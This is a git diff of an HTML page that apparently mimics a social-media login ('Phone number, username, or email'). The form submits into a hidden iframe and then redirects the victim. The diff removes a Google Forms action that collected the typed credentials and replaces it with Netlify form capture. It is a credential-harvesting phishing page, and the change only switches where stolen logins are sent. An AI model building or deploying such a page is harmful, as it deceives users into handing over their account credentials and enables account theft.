--- a/index.html
+++ b/index.html
@@ -17,7 +17,7 @@
                   <iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){
                   window.location='black.html';}"></iframe>
                   
-<form action="https://docs.google.com/forms/u/0/d/e/1FAIpQLSfQIAJ-7bnSyzq7iCEx1PS6579WY8uy_Ise0sa2iu6ksdRx9g/formResponse" target="hidden_iframe" onsubmit="submitted=true" method="POST">
+<form name="dbnet" netlify target="hidden_iframe" onsubmit="submitted=true" method="POST">
                     <div class="input-box">
                       <input type="text" id="name" aria-describedby="" placeholder="Phone number, username, or email" aria-required="true" maxlength="30" autocapitalize="off" autocorrect="off" name="entry.1256530639" value="" required>
                     </div>  
